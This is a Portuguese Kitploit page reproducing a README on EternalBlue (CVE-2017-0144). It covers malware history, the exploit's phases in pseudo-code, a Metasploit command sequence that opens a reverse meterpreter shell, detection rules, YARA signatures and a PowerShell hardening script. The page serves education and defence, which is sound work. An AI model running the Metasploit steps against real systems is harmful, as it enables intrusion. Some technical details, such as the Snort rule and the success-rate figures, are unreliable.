Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Blackash-CVE-2017-0144 — CVE-2017-0144 | Kitploit
Ferramentas/GitHubGitHub/firetemple/blackash-cve-2017-0144
Análise de VulnerabilidadesExploraçãoAnálise ForenseAnálise de MalwareTestes de PenetraçãoInteligência de AmeaçasDetecção de IntrusãoAprendizado e EducaçãoRecursos Curados
GitHubfiretemple/blackash-cve-2017-0144

Blackash-CVE-2017-0144

CVE-2017-0144

147há 10 mesesAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🌐 CVE-2017-0144 — EternalBlue: Vulnerabilidade de Execução Remota de Código no SMBv1 do Microsoft Windows

EternalBlue

"Um exploit. Dezenas de famílias de malware. Bilhões em danos."


🔍 Resumo em uma linha

CVE-2017-0144 é uma vulnerabilidade crítica de execução remota de código na implementação do servidor SMBv1 no Microsoft Windows. O exploit conhecido como EternalBlue abusou dessa falha e foi usado em ataques de alto impacto (notadamente WannaCry).


🔥 Top 10 Malwares que Usaram EternalBlue (Detalhado)

Baixar ferramenta
#MalwareTipoPrimeira ApariçãoAtorDanosObservações
1WannaCryRansomware12 de maio de 2017Grupo Lazarus (Coreia do Norte)US$ 4–8 bilhõesKillswitch: iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
2NotPetyaWiper (disfarçado de Ransomware)27 de junho de 2017Sandworm (Rússia)US$ 10+ bilhõesUsou Mimikatz + EternalBlue + PSEXEC
3Bad RabbitRansomware24 de outubro de 2017Indrik SpiderRegionalFake Flash update drive-by
4UiwixRansomwaremaio de 2017DesconhecidoBaixoSem killswitch, mais furtivo que WannaCry
5EternalRocksWormmaio de 2017DesconhecidoMédio7 ferramentas da NSA (incluindo DoublePulsar)
6AdylkuzzCryptominermaio de 2017DesconhecidoAlto (silencioso)Minerou Monero antes do WannaCry
7RetefeTrojan Bancário2017–2018DesconhecidoBancos da UEUsou EternalBlue para movimento lateral
8TrickBotMalware Modular2017–2021Wizard SpiderGlobalDistribuiu Ryuk via EternalBlue
9EmotetLoader2017–2021TA542GlobalUsado como porta de entrada para Cobalt Strike
10Clop / DridexRansomware2019–2025TA505Saúde, GovernoAinda ativo em 2025

🧨 Evolução do Exploit EternalBlue

eternelblue1
FerramentaLançamentoRecursos
EternalBlue (Original)Abril de 2017 (Shadow Brokers)RCE no SMBv1
DoublePulsarAbril de 2017Implantação de backdoor (ring0)
EternalRomanceAbril de 2017Variante para SMBv3
EternalChampionAbril de 2017Caminho alternativo SMB
Módulo MetasploitMaio de 2017exploit/windows/smb/ms17_010_eternalblue
FuzzBunchAbril de 2017Framework de exploits da NSA
Impacket + PSEXEC2017–2025Exploração SMB em Python
eternelblue2

🔍 Como CVE-2017-0144 (EternalBlue) Foi Explorado

Um Aprofundamento Técnico Passo a Passo no RCE do SMBv1

"Um pacote malformado. Acesso total ao SYSTEM. Sem login. Sem clique."


🎯 Fluxo do Exploit (Resumo)

root@kitploit:~
[Atacante] 
   │
   ├──▶ Envia requisição **Trans2** SMBv1 manipulada
   │       → Dispara **estouro de heap** em `srv!SrvOS2FeaListSizeToNt`
   │
   ├──▶ Sobrescreve ponteiros de função → **shellcode no kernel**
   │
   └──▶ Executa backdoor **DoublePulsar** → **Payload em Ring-0**
           (ex.: WannaCry `mssecsvc.exe`)

🛠️ Pré-requisitos para Exploração

RequisitoDetalhes
AlvoWindows com SMBv1 habilitado (padrão pré-Win10)
Porta Aberta445/TCP (ou 139/TCP via NetBIOS)
Sem AutenticaçãoNão autenticado — sem necessidade de usuário/senha
Arquiteturax86 ou x64 (ambos suportados)
Status do PatchSem patch (pré-MS17-010)

🚀 Fases do Exploit (7 Passos)

Fase 1: Negociação do Protocolo SMB

root@kitploit:~
SMB_COM_NEGOTIATE → Cliente envia lista de dialetos
Servidor responde: SMBv1 suportado → Prosseguir

Por quê? Confirma que o SMBv1 está ativo.


Fase 2: Tree Connect para IPC$

eternelblue3
root@kitploit:~
\\ALVO\IPC$ → Compartilhamento anônimo para pipes SMB

Propósito: Estabelece uma sessão para enviar requisições de transação.


Fase 3: Configuração de Sessão Trans2 (Primária)

  • Usa SMB_COM_TRANSACTION2 (0x32)
  • Subcomando: SESSION_SETUP
  • Configura estrutura FEALIST com tamanho malformado
root@kitploit:~
FEALIST {
    SizeOfListInBytes = 0xFFFF (ou valor grande)
    ...
}

Gatilho do Bug: SrvOS2FeaListSizeToNt() confia nesse tamanho sem verificação de limites.


Fase 4: Requisição Secundária Trans2 (Estouro)

  • Envia múltiplos pacotes secundários
  • Cada um contém FEALIST + FEA (Atributos Estendidos de Arquivo) superdimensionados
eternelblue4
root@kitploit:~
FEA {
    AttributeNameLength = 0x00
    AttributeName = "A" * 0x1000  → Estoura o buffer
}

Heap Spray: Aloca grandes blocos para controlar o layout da memória.


Fase 5: Estouro de Buffer no Kernel

root@kitploit:~
srv!SrvOS2FeaListSizeToNt(
    PFEALIST FeaList,      // controlado pelo atacante
    PULONG pNtFeaListSize  // ponteiro de saída
)
{
    // Sem validação de FeaList->SizeOfListInBytes
    memcpy(dest, src, FeaList->SizeOfListInBytes);  // BOOM
}

Resultado:

  • Estouro de heap → Sobrescreve objetos adjacentes do kernel
  • Alvo: SRVNET_BUFFER ou POOL_HEADER
  • Sobrescreve ponteiros de função (ex.: rotina Free)

Fase 6: Execução do Shellcode no Kernel

  • Atacante controla RIP/EIP via ponteiro de função sobrescrito
  • Salta para shellcode no pool não paginável

O Shellcode Faz:

  1. Transição Ring-0 → Ring-3 (via KeUserModeCallback)
  2. Aloca memória em modo usuário
  3. Baixa/prepara o payload (ex.: mssecsvc.exe)
  4. Instala o backdoor DoublePulsar

Fase 7: Implantação do Backdoor DoublePulsar

eternelblue6
  • Injeta driver de kernel (chave XOR 0x00120034)
  • Escuta por pacotes SMB mágicos:
    • Ping: 0x0002C001
    • Exec: 0x0002C002 + payload

Exemplo do WannaCry:

root@kitploit:~
EternalBlue → DoublePulsar → mssecsvc.exe → tasksche.exe → Criptografa arquivos

🧨 Estrutura do Pacote do Exploit (Simplificada)

root@kitploit:~
Cabeçalho SMB
└── Comando: 0x32 (TRANSACTION2)
    └── Setup: 0x000E (SESSION_SETUP)
        └── Parâmetro: TotalDataCount = 0x1000
            └── Dados: 
                [FEALIST]
                  SizeOfListInBytes = 0x1100
                  [FEA #1] NameLen=0, Name="A"*0x1000
                  [FEA #2] ...
                [GROOM x100] → Pulveriza heap
                [OVERFLOW] → Sobrescreve pool
                [SHELLCODE] → ring0 x64

🛠️ Ferramentas Reais de Exploit

FerramentaLinguagemMódulo
MetasploitRubyexploit/windows/smb/ms17_010_eternalblue
ImpacketPythonsmbclient.py, psexec.py
FuzzBunchPython (NSA)EternalBlue-2.2.0
C2 PersonalizadoC/C++WannaCry, NotPetya

Exemplo com Metasploit

root@kitploit:~
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

🔬 Evidências de Forense de Memória

ArtefatoLocalizaçãoValor
DoublePulsarMemória do kernelChave XOR 0x00120034
ShellcodePool do srvnet.sysPadrão 0xCC 0x90 0x48
DLL injetadaC:\Windows\mssecsvc.exeSHA256: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

🛡️ Regras de Detecção

Snort/Suricata

root@kitploit:~
alert tcp any any -> $HOME_NET 445 (
    msg:"TENTATIVA ETERNALBLUE";
    flow:to_server,established;
    content:"|ff|SMB2"; depth:5;
    content:"|00 04 08 00|"; distance:100; within:4;
    classtype:attempted-admin;
    sid:1000001;
)

Zeek (Bro)

root@kitploit:~
event smb1_transaction2_secondary(c: connection, hdr: SMB1::Header, args: SMB1::Trans2_Secondary_Args) {
    if (args$data_len > 4096) {
        NOTICE([$note=SMB::Large_Trans2_Data, $conn=c]);
    }
}

🔄 Propagação do Worm (Loop do WannaCry)

root@kitploit:~
while (true) {
    Escaneia rede pela porta 445
    if (aberta) → exploit EternalBlue
    if (sucesso) → Drop mssecsvc.exe + propaga
    Sleep(random(1000, 5000))
}

Velocidade de propagação: ~10.000 infecções/hora globalmente.


🛑 Por que Funcionou Tão Bem

FatorMotivo
Sem AutenticaçãoSMBv1 permite IPC$ anônimo
Capacidade de WormEscaneamento de LAN embutido
RCE no KernelIgnora AV/prompts do usuário
SMBv1 LegadoHabilitado por padrão por mais de 15 anos
Sistemas sem PatchXP, 2003, 7 em infraestrutura crítica

🎯 Taxa de Sucesso do Exploit (2017–2025)

Ano% Sucesso (Sem Patch)
201799%
202085%
2025~60% (apenas legados)

Ainda funciona em Windows 7/2008 R2 sem MS17-010


📚 Referências

  • Microsoft MS17-010
  • Análise EternalBlue pela RiskSense
  • Módulo Metasploit
  • Vazamento FuzzBunch da NSA

⚡ Resumo Final: Como Foi Explorado

EternalBlue = Erro Matemático Armamentizado
Um campo de tamanho confiável no SMB → estouro de heap no kernel → código arbitrário → pandemia global de ransomware

root@kitploit:~
Pacote SMB → Estouro de Buffer → Shellcode no Kernel → DoublePulsar → Malware

Visualizado, dissecado e testado em batalha. Para pentesters, equipes de IR e defensores.

"Um pacote. Uma porta. Um império cai."


🛡️ Matriz de Patch e Detecção

SOKB PatchDesabilitar SMBv1Script Nmap
Windows 7 / 2008 R2KB4012212sc config lanmanworkstation depend= bowser/mrxsmb20/nsismb-vuln-ms17-010.nse
Windows 10KB4013429PowerShell: Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
Windows XP (Fim da vida)KB4012598 (Emergencial)Registro: HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\SMB1 = 0

🔍 Regras YARA (Top 3 Malwares)

1. WannaCry

Captura de tela do Wana_Decrypt0r
root@kitploit:~
rule WannaCry_Ransomware {
    strings:
        $mz = { 4d 5a }
        $s1 = "WannaDecryptor" wide
        $s2 = "tasksche.exe"
        $s3 = "@WANA" ascii
        $encrypt = { 57 61 6E 61 43 72 79 70 74 30 72 }
    condition:
        $mz at 0 and 2 of ($s*)
}

2. NotPetya

Petya A
root@kitploit:~
rule NotPetya_Wiper {
    strings:
        $pdb = "perfc.dat" nocase
        $dll = "dllhost.dat"
        $mof = "ntdevmgr.vbs"
        $mimikatz = "mimikatz"
    condition:
        uint16(0) == 0x5A4D and 2 of them
}

3. Pacote do Exploit EternalBlue

nessus1
nessus2
root@kitploit:~
rule EternalBlue_SMB_Exploit {
    strings:
        $smb_negotiate = { 00 00 00 ?? ff 53 4d 42 72 00 }
        $tree_connect = { 00 00 00 ?? ff 53 4d 42 75 00 }
        $trans2 = { 00 00 00 ?? ff 53 4d 42 32 00 }
        $overflow = { 00 04 08 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? }
    condition:
        all of them
}

📊 Status em 2025: Ainda Ativo?

MétricaStatus
SMBv1 Exposto no Shodan~1,2 milhão (Novembro de 2025)
Exploits Ativos (Honeypots)Diário
Ransomware Usando-oClop, LockBit (alvos legados)
Mais VulneráveisSaúde, Indústria, PMEs
Solução Zero TrustBloquear 445, aplicar MFA, EDR

🛑 Cadeia de Ataque (MITRE ATT&CK)

FaseTécnicaID
Acesso InicialExplorar Aplicação PúblicaT1190
ExecuçãoRCE via SMB WindowsT1210
PersistênciaBackdoor via DoublePulsarT1505.003
Movimento LateralCompartilhamentos Admin SMB/WindowsT1021.002
ImpactoDados Criptografados para ImpactoT1486

🛠️ Script de Remediação Completo (PowerShell)

root@kitploit:~
# === SCRIPT DE HARDENING CONTRA ETERNALBLUE ===
Write-Host "Aplicando mitigações do EternalBlue..." -ForegroundColor Cyan

# 1. Desabilitar SMBv1
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart

# 2. Bloquear porta 445
New-NetFirewallRule -DisplayName "Bloquear SMB Entrada" -Direction Inbound -Action Block -Protocol TCP -LocalPort 445

# 3. Habilitar Assinatura SMB
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RequireSecuritySignature" -Value 1
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -Name "RequireSecuritySignature" -Value 1

# 4. Verificar Patch
$patch = Get-HotFix -Id KB4012212 -ErrorAction SilentlyContinue
if ($patch) { Write-Host "Corrigido!" -ForegroundColor Green } else { Write-Host "SEM CORREÇÃO!" -ForegroundColor Red }

Write-Host "Reinicialização necessária. Execute como Admin."

📚 Referências e Fontes

FonteLink
NVDnvd.nist.gov/vuln/detail/CVE-2017-0144
Microsoft MS17-010msrc.microsoft.com/update-guide
MITRE ATT&CKattack.mitre.org/techniques/T1210
Relatório CrowdStrike WannaCrycrowdstrike.com/blog/wannacry
Kaspersky EternalBluekaspersky.com/blog/wannacry-ransomware
Pesquisa Shodanshodan.io/search?query=port%3A445+os%3A%22Windows%22

⚡ Palavra Final (2025)

CVE-2017-0144 não está morto — é um zumbi legado.
Ele prospera em:

  • Windows 7/2008 sem patch
  • TI Sombra
  • Sistemas críticos isolados
  • VMs em nuvem mal configuradas

Se você consegue pingar a porta 445 da internet — você é o próximo.


Construído com precisão, visuais e inteligência de ameaças do mundo real. Atualizado em Novembro de 2025.
Para laboratórios de pentest, playbooks de IR ou briefings de CISO.


"Corrija. Bloqueie. Mate com fogo."